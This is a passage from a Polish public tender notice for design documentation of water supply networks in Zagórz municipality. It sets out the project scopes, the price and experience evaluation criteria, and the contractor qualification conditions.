przedmiocie sieci wodociągowych dokumentacji projektowych lub projektów budowlanych w zakresie rozwiązań dotyczących budowy lub rozbudowy lub przebudowy sieci wodociągowych. Maksymalną ilość 40 punktów otrzyma Wykonawca, który wykaże, że zrealizował co najmniej 3 takie opracowania. W przypadku nie wykazania doświadczenia w wykonanych przez Wykonawcę w przedmiocie sieci wodociągowych dokumentacji projektowych lub projektów budowlanych w zakresie rozwiązań dotyczących budowy lub rozbudowy lub przebudowy sieci wodociągowych, Wykonawca nie otrzyma punktów (0 pkt).<br/>3.	Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów (O) obliczoną na podstawie wzoru:<br/>O = C + W <br/>gdzie: <br/>O - łączna ilość punktów oferty ocenianej <br/>C - liczba punktów uzyskanych w kryterium „Cena ryczałtowa brutto” <br/>W - liczba punktów uzyskanych w kryterium „Doświadczenie Wykonawcy”<br/>4.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>5.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>6.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Jeżeli zamawiający nie będzie prowadził negocjacji, dokona wyboru najkorzystniejszej oferty spośród niepodlegających odrzuceniu ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 pn. ,,Dokumentacja projektowa dla miejscowości Zagórz ul. Mostowa” <br/>	<br/>I.	Opracowanie dokumentacji projektowej wraz z uzyskaniem prawomocnego pozwolenia na budowę (lub zgłoszenia wykonania robót budowlanych) oraz pełnieniem nadzoru autorskiego dla inwestycji pn.: „Budowa odcinka sieci wodociągowej w miejscowości Zagórz, ul. Mostowa” <br/>II.	Przedmiot zamówienia:<br/>1) wykonanie kompletnej dokumentacji projektowej dla budowy sieci wodociągowej w miejscowości Zagórz, ul. Mostowa;<br/>2)	obszar objęty inwestycją – nieruchomości zlokalizowane przy ul. Mostowej oraz ul. Kopernika w miejscowości Zagórz, wg załącznika graficznego nr 1<br/>3) doprowadzenie wody do obszaru objętego inwestycją należy zaprojektować <br/>zgodnie z: <br/>a)	warunkami technicznymi wydanymi przez SPGK Sp. z o.o. w Sanoku znak ZWK.4411.2.16.2022 <br/>b)	dokumentem o nazwie „Wytyczne techniczne do projektowania i realizacji sieci, przyłączy oraz urządzeń wodociągowych i kanalizacyjnych” dostępnym na stronie internetowej SPGK Sp. z o.o. w Sanoku pod adresem https://zwk.spgk.com.pl/o-firmie/dokumenty-do-pobrania/<br/>III.	Zamawiający informuje ponadto, że: <br/>1)	w ramach inwestycji może dojść do konieczności zaprojektowania urządzenia do lokalnego podwyższania ciśnienia wody w formie hydroforni. Obiekt powinien być opracowany zgodnie z wytycznymi SPGK Sp. z o.o. w Sanoku. Zamawiający informuje, że obiekt hydroforni wody powinien być opracowany jako wolnostojący budynek wykonany w technologii tradycyjnej, tj. murowany z dachem czterospadowym wraz z dociepleniem ścian. Obiekt musi być także ogrodzony oraz mieć zapewniony dojazd. Wobec powyższego Wykonawca w ramach zaoferowanej ceny musi przewidzieć wynagrodzenie dla poszczególnych branżystów (architekt, konstruktor, elektryk, drogowiec). <br/>2)	dokonał rozeznania chęci korzystania z nowo projektowanej infrastruktury wśród właścicieli nieruchomości, z którego wynika, że zamierza z niej korzystać 15 nieruchomości. Przewiduje się, że łączna liczba odbiorców wynosić będzie ok. 44 osoby,<br/>3)	zaproponowane rozwiązania muszą uwzględniać dalszą rozbudowę sieci wodociągowej na terenie Gminy Zagórz, zapewnić ekonomiczną realizację oraz eksploatację sieci wodociągowej,<br/>IV.	Zakres zamówienia obejmował będzie sporządzenie dwóch odrębnych dokumentacji dla każdej z inwestycji obejmującej: <br/>1)	sporządzenie kompletnego wniosku oraz uzyskanie decyzji o ustaleniu lokalizacji inwestycji celu publicznego wraz z wymaganymi załącznikami;<br/>2)	aktualizację map do celów projektowych;<br/>3)	uzyskanie na rzecz Zamawiającego prawa do dysponowania nieruchomościami na cele budowlane oraz zgody dla przetwarzania danych osobowych od właścicieli, przez których nieruchomości będzie przebiegać planowana inwestycja; <br/>4)	uzyskanie przewidzianych prawem uzgodnień i decyzji administracyjnych niezbędnych do prawidłowej realizacji zadania;<br/>5)	opracowanie kompletnego projektu budowlanego sieci wodociągowej opracowanego zgodnie z przepisami Prawa budowlanego i spełniającego wymagania Rozporządzenia Ministra Rozwoju z dnia 11 września 2020r. w sprawie szczegółowego zakresu i formy projektu budowlanego (z uwzględnieniem ewentualnych nowelizacji ww. przepisów, które mogą nastąpić w toku realizacji umowy) – Projekt budowlany należy wykonać w ilości 5 egzemplarzy w formie papierowej oraz 1 egzemplarz w formie elektronicznej;<br/>6)	opracowanie kompletnego projektu wykonawczego, uszczegółowiającego projekt budowlanym, zgodnie z przepisami Rozporządzenia Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (z uwzględnieniem ewentualnych nowelizacji ww. przepisów, które mogą nastąpić w toku realizacji umowy) – Projekt wykonawczy należy wykonać w ilości 5 egzemplarzy w formie papierowej oraz 1 egzemplarz w formie elektronicznej;<br/>7)	opracowanie zbiorczego projektu przyłączy wodociągowych dla nieruchomości, których właściciele wyrazili chęć korzystania z projektowanej sieci wodociągowej – Zbiorczy projekt przyłączy należy wykonać w ilości 2 egzemplarzy <br/>w formie pisemnej oraz 1 egzemplarz w formie elektronicznej;<br/>8)	sporządzenie kosztorysu inwestorskiego, przedmiaru robót oraz specyfikacji technicznej wykonania i odbioru robót – Powyższe dokumenty należy wykonać w ilości po 2 egzemplarze w formie papierowej oraz po 1 egzemplarzu w formie elektronicznej edytowalnej;<br/>9)	pełnienie funkcji nadzoru autorskiego podczas realizacji inwestycji oraz w okresie rękojmi za wady dla robót budowlanych realizowanych na podstawie dokumentacji projektowej opracowanej przez Wykonawcę;<br/>10)	udziału w procedurze wyłonienia wykonawcy robót realizowanych w oparciu o ww. dokumentację projektową, w tym przygotowanie odpowiedzi na pytania Wykonawców robót, udzielania wyjaśnień dotyczących opracowanej dokumentacji projektowej oraz dokonywania ewentualnych modyfikacji (poprawek i uzupełnień) w opracowanej dokumentacji projektowej i przetargowej, w trakcie postępowania przetargowego na realizację robót budowlanych dla przedsięwzięcia polegającego na budowie przedmiotowego przedsięwzięcia; <br/>11)	zaprojektowana inwestycja spełniać ma wymogi dostępności wynikające z ustawy z dnia 19 lipca 2019 r. o zapewnianiu dostępności osobom ze szczególnymi potrzebami, a w szczególności minimalne wymagania o których mowa w art. 6 ww. ustawy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">71322200-3 - Usługi projektowania rurociągów</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert dla części 1, części 2 oraz części 3 :<br/>1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	Cena ryczałtowa brutto (C) - waga kryterium 60%;<br/>2)	Doświadczenie Wykonawcy (W) - waga kryterium 40 %.<br/>2.	Zasady oceny ofert w poszczególnych kryteriach:<br/><br/>1) Cena ryczałtowa brutto (C) - waga 60%<br/><br/>Cena najniższa brutto*<br/>C = ------------------------------------------------ x 60 pkt<br/> Cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a)	Podstawą przyznania punktów w kryterium &#34;cena&#34; będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>b)	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/><br/>2)	Doświadczenie Wykonawcy (W) - waga 40%<br/><br/><br/><br/><br/>Ilość opracowań dokumentacji projektowych lub projektów budowlanych w zakresie rozwiązań dotyczących budowy, przebudowy, rozbudowy sieci wodociągowych.	Liczba punktów do uzyskania:<br/>3 opracowania	40 pkt<br/>2 opracowania	20 pkt<br/> 1 opracowanie 10 pkt<br/>0 opracowań	0 pkt<br/><br/>W kryterium ,,Doświadczenie Wykonawcy (W)” będzie oceniana ilość wykonanych przez Wykonawcę w przedmiocie sieci wodociągowych dokumentacji projektowych lub projektów budowlanych w zakresie rozwiązań dotyczących budowy lub rozbudowy lub przebudowy sieci wodociągowych. Maksymalną ilość 40 punktów otrzyma Wykonawca, który wykaże, że zrealizował co najmniej 3 takie opracowania. W przypadku nie wykazania doświadczenia w wykonanych przez Wykonawcę w przedmiocie sieci wodociągowych dokumentacji projektowych lub projektów budowlanych w zakresie rozwiązań dotyczących budowy lub rozbudowy lub przebudowy sieci wodociągowych, Wykonawca nie otrzyma punktów (0 pkt).<br/>3.	Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów (O) obliczoną na podstawie wzoru:<br/>O = C + W <br/>gdzie: <br/>O - łączna ilość punktów oferty ocenianej <br/>C - liczba punktów uzyskanych w kryterium „Cena ryczałtowa brutto” <br/>W - liczba punktów uzyskanych w kryterium „Doświadczenie Wykonawcy”<br/>4.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>5.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>6.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Jeżeli zamawiający nie będzie prowadził negocjacji, dokona wyboru najkorzystniejszej oferty spośród niepodlegających odrzuceniu ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3 pn. ,,Dokumentacja projektowa dla miejscowości Łukowe oraz Średnie Wielkie”<br/>I.	Przedmiotem zamówienia jest opracowanie dokumentacji projektowej wraz z uzyskaniem prawomocnego pozwolenia na budowę (lub zgłoszenia wykonania robót budowlanych) oraz pełnieniem nadzoru autorskiego dla inwestycji pn.: „Budowa sieci wodociągowej w miejscowościach Łukowe i Średnie Wielkie”.<br/>II.	Przedmiot zamówienia:<br/>1)	z uwagi na obszar objęty inwestycją, przedmiot zamówienia został podzielony na cztery zadania. Zakres poszczególnych dokumentacji (zadań) został przedstawiony na załączniku graficznym nr 1 i obejmuje opracowanie dokumentacji dla miejscowości: Łukowe (kolor czarny), Łukowe przysiółek „Bania” (kolor fioletowy), Średnie Wielkie (kolor czerwony) i Średnie Wielkie przysiółek „Ropy” (kolor zielony);<br/>2)	wykonanie dokumentacji dla rozbudowy istniejącego ujęcia wody zlokalizowanego w miejscowości Średnie Wielkie na działce nr ew. 429/7 wraz z uzyskaniem zgody wodnoprawnej;<br/>3)	doprowadzenie wody do obszaru objętego inwestycją należy zaprojektować <br/>zgodnie z warunkami technicznymi wydanymi przez ZUT Sp. z o.o. w Zagórzu, znak ZUT/AK/2022/19 z dnia 23.03.2022r. (załącznik nr 2);<br/>4)	umożliwienie podłączenia do projektowanej sieci użytkowanych budynków mieszkalnych, usługowych, użyteczności publicznej (w m. Łukowe są to Szkoła Podstawowa, Świetlica Wiejska oraz Kościół Parafialny, natomiast w m. Średnie Wielkie jest to Świetlica Wiejska) oraz budynków będących w trakcie budowy.<br/>III.	Zamawiający informuje ponadto, że: <br/>1)	funkcjonująca stacja uzdatniania wody zlokalizowana jest w miejscowości Średnie Wielkie – na działce nr ew. 429/7, posiada wydajność dobową wynoszącą ok. 20 m3;<br/>2)	w ramach inwestycji może dojść do konieczności zaprojektowania zbiornika ppoż. oraz urządzenia do lokalnego podwyższania ciśnienia wody w formie hydroforni. Oba obiekty powinny być opracowane zgodnie z wytycznymi ZUT Sp. z o.o. w Zagórzu. Obiekty muszą być ogrodzone oraz mieć zapewniony dojazd. Wobec powyższego Wykonawca w ramach zaoferowanej ceny musi przewidzieć wynagrodzenie dla poszczególnych branżystów (architekt, konstruktor, elektryk, drogowiec);<br/>3)	przewiduje się, że łączna liczba odbiorców w obu miejscowościach wynosić będzie ok. 816 osób (w tym 200 osób istniejących odbiorców);<br/>4)	zaproponowane rozwiązania muszą uwzględniać dalszą rozbudowę sieci wodociągowej na terenie Gminy Zagórz, zapewnić ekonomiczną realizację oraz eksploatację sieci wodociągowej;<br/>5)	dokumentacja projektowa sieci będzie wymagała w szczególności sporządzenia opracowań dla przekroczeń drogi powiatowej oraz potoku Tarnawka, wobec czego Wykonawca w ramach oferowanej ceny powinien uwzględnić koszty ich opracowania.<br/>IV.	Zakres zamówienia obejmował będzie sporządzenie czterech odrębnych dokumentacji dla każdej z inwestycji obejmującej: <br/>1)	sporządzenie kompletnego wniosku oraz uzyskanie decyzji o ustaleniu lokalizacji inwestycji celu publicznego wraz z wymaganymi załącznikami (dla każdej z dokumentacji projektowej);<br/>2)	aktualizację map do celów projektowych;<br/>3)	uzyskanie na rzecz Zamawiającego prawa do dysponowania nieruchomościami na cele budowlane oraz zgody dla przetwarzania danych osobowych od właścicieli, przez których nieruchomości będzie przebiegać planowana inwestycja; <br/>4)	uzyskanie przewidzianych prawem uzgodnień i decyzji administracyjnych niezbędnych do prawidłowej realizacji zadania;<br/>5)	opracowanie operatu wodnoprawnego dla rozbudowy istniejącego ujęcia wody w miejscowości Średnie Wielkie wraz z uzyskaniem decyzji o pozwoleniu wodnoprawnym (wraz z dokumentacją projektową sieci wodociągowej w m. Średnie Wielkie);<br/>6)	opracowanie operatu wodnoprawnego dla wykonania przekroczeń potoku Tarnawka (Kalniczka) oraz potoków bez nazwy wraz z uzyskaniem zgody wodnoprawnej;<br/>7)	opracowanie kompletnego projektu budowlanego sieci wodociągowej opracowanego zgodnie z przepisami Prawa budowlanego i spełniającego wymagania Rozporządzenia Ministra Rozwoju z dnia 11 września 2020r. w sprawie szczegółowego zakresu i formy projektu budowlanego (z uwzględnieniem ewentualnych nowelizacji ww. przepisów, które mogą nastąpić w toku realizacji umowy) – Projekt budowlany należy wykonać w ilości 5 egzemplarzy w formie papierowej oraz 1 egzemplarz w formie elektronicznej;<br/>8)	opracowanie kompletnego projektu wykonawczego, uszczegółowiającego projekt budowlanym, zgodnie z przepisami Rozporządzenia Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (z uwzględnieniem ewentualnych nowelizacji ww. przepisów, które mogą nastąpić w toku realizacji umowy) – Projekt wykonawczy należy wykonać w ilości 5 egzemplarzy w formie papierowej oraz 1 egzemplarz w formie elektronicznej;<br/>9)	opracowanie zbiorczego projektu przyłączy wodociągowych dla nieruchomości, których właściciele wyrazili chęć korzystania z projektowanej sieci wodociągowej – Zbiorczy projekt przyłączy należy wykonać w ilości 2 egzemplarzy <br/>w formie pisemnej oraz 1 egzemplarz w formie elektronicznej;<br/>10)	sporządzenie kosztorysu inwestorskiego, przedmiaru robót oraz specyfikacji technicznej wykonania i odbioru robót – Powyższe dokumenty należy wykonać w ilości po 2 egzemplarze w formie papierowej oraz po 1 egzemplarzu w formie elektronicznej edytowalnej;<br/>11)	pełnienie funkcji nadzoru autorskiego podczas realizacji inwestycji oraz w okresie rękojmi za wady dla robót budowlanych realizowanych na podstawie dokumentacji projektowej opracowanej przez Wykonawcę;<br/>12)	udziału w procedurze wyłonienia wykonawcy robót realizowanych w oparciu o ww. dokumentację projektową, w tym przygotowanie odpowiedzi na pytania Wykonawców robót, udzielania wyjaśnień dotyczących opracowanej dokumentacji projektowej oraz dokonywania ewentualnych modyfikacji (poprawek i uzupełnień) w opracowanej dokumentacji projektowej i przetargowej, w trakcie postępowania przetargowego na realizację robót budowlanych dla przedsięwzięcia polegającego na budowie przedmiotowego przedsięwzięcia; <br/>13)	zaprojektowana inwestycja spełniać ma wymogi dostępności wynikające z ustawy z dnia 19 lipca 2019 r. o zapewnianiu dostępności osobom ze szczególnymi potrzebami, a w szczególności minimalne wymagania o których mowa w art. 6 ww. ustawy.<br/>14)	Zamawiający informuje, że została zawarta umowa dla opracowania dokumentacji projektowej sieć kanalizacji sanitarnej w miejscowości Średnie Wielkie, wobec czego Wykonawca zobowiązany będzie do ścisłej współpracy w celu uniknięcia wszelakich kolizji obu projektowanych sieci. W przypadku usytuowania odcinka wodociągu w miejscu zaprojektowanej kanalizacji sanitarnej do obowiązków Wykonawcy należeć będzie dokonanie zmiany przebiegu odcinka wodociągu.<br/>15)	Zamawiający dostarczy Wykonawcy mapy do celów projektowych dla miejscowości Średnie Wielkie aktualne na dzień ich przekazania, w terminie do 6 miesięcy od dnia podpisania umowy. Wykonawca zobowiązany jest do aktualizacji mapy w zakresie niezbędnym dla opracowania dokumentacji projektowej objętej niniejszym postępowaniem </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">71322200-3 - Usługi projektowania rurociągów</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">23 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert dla części 1, części 2 oraz części 3 :<br/>1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	Cena ryczałtowa brutto (C) - waga kryterium 60%;<br/>2)	Doświadczenie Wykonawcy (W) - waga kryterium 40 %.<br/>2.	Zasady oceny ofert w poszczególnych kryteriach:<br/><br/>1) Cena ryczałtowa brutto (C) - waga 60%<br/><br/>Cena najniższa brutto*<br/>C = ------------------------------------------------ x 60 pkt<br/> Cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a)	Podstawą przyznania punktów w kryterium &#34;cena&#34; będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>b)	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/><br/>2)	Doświadczenie Wykonawcy (W) - waga 40%<br/><br/><br/><br/><br/>Ilość opracowań dokumentacji projektowych lub projektów budowlanych w zakresie rozwiązań dotyczących budowy, przebudowy, rozbudowy sieci wodociągowych.	Liczba punktów do uzyskania:<br/>3 opracowania	40 pkt<br/>2 opracowania	20 pkt<br/> 1 opracowanie 10 pkt<br/>0 opracowań	0 pkt<br/><br/>W kryterium ,,Doświadczenie Wykonawcy (W)” będzie oceniana ilość wykonanych przez Wykonawcę w przedmiocie sieci wodociągowych dokumentacji projektowych lub projektów budowlanych w zakresie rozwiązań dotyczących budowy lub rozbudowy lub przebudowy sieci wodociągowych. Maksymalną ilość 40 punktów otrzyma Wykonawca, który wykaże, że zrealizował co najmniej 3 takie opracowania. W przypadku nie wykazania doświadczenia w wykonanych przez Wykonawcę w przedmiocie sieci wodociągowych dokumentacji projektowych lub projektów budowlanych w zakresie rozwiązań dotyczących budowy lub rozbudowy lub przebudowy sieci wodociągowych, Wykonawca nie otrzyma punktów (0 pkt).<br/>3.	Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów (O) obliczoną na podstawie wzoru:<br/>O = C + W <br/>gdzie: <br/>O - łączna ilość punktów oferty ocenianej <br/>C - liczba punktów uzyskanych w kryterium „Cena ryczałtowa brutto” <br/>W - liczba punktów uzyskanych w kryterium „Doświadczenie Wykonawcy”<br/>4.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>5.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>6.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Jeżeli zamawiający nie będzie prowadził negocjacji, dokona wyboru najkorzystniejszej oferty spośród niepodlegających odrzuceniu ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności technicznej lub zawodowej:<br/>Warunek dotyczy Wykonawców składających ofertę na realizację zadania w zakresie:<br/>Część 1 pn. ,,Dokumentacja projektowa dla miejscowości Tarnawa Dolna oraz Tarnawa Górna”<br/>Zamawiający uzna ww. warunek za spełniony, jeżeli:<br/>a)	Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej jedną usługę polegającą na wykonaniu dokumentacji projektowej w zakresie budowy lub rozbudowy lub przebudowy sieci wodociągowej o wartości min. 220 000,00 zł brutto.<br/><br/>b)	dysponuje minimum 1 osobą Projektanta zdolną do wykonania zamówienia tj. posiadającą uprawnienia projektowe określone przepisami Prawa budowalnego w następujących specjalnościach: uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń.<br/><br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, powyższy warunek musi zostać spełniony minimum przez jednego z wykonawców.<br/><br/>Warunek dotyczy Wykonawców składających ofertę na realizację zadania w zakresie:<br/>Część 2 pn. ,,Dokumentacja projektowa dla miejscowości Zagórz ul. Mostowa”<br/>Zamawiający uzna ww. warunek za spełniony, jeżeli:<br/>a)	Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej jedną usługę polegającą na wykonaniu dokumentacji projektowej w zakresie budowy lub rozbudowy lub przebudowy sieci wodociągowej o wartości min. 35 000,00 zł brutto.<br/><br/>b)	dysponuje minimum 1 osobą Projektanta zdolną do wykonania zamówienia tj. posiadającą uprawnienia projektowe określone przepisami Prawa budowalnego w następujących specjalnościach: uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń<br/><br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, powyższy warunek musi zostać spełniony minimum przez jednego z wykonawców. <br/><br/>Warunek dotyczy Wykonawców składających ofertę na realizację zadania w zakresie:<br/>Część 3 pn. ,,Dokumentacja projektowa dla miejscowości Łukowe oraz Średnie Wielkie”<br/>Zamawiający uzna ww. warunek za spełniony, jeżeli:<br/>a)	Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej jedną usługę polegającą na wykonaniu dokumentacji projektowej w zakresie budowy lub rozbudowy lub przebudowy sieci wodociągowej o wartości min. 260 000,00 zł brutto.<br/><br/>b)	dysponuje minimum 1 osobą Projektanta zdolną do wykonania zamówienia tj. posiadającą uprawnienia projektowe określone przepisami Prawa budowalnego w następujących specjalnościach: uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń<br/><br/><br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, powyższy warunek musi zostać spełniony minimum przez jednego z wykonawców <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o 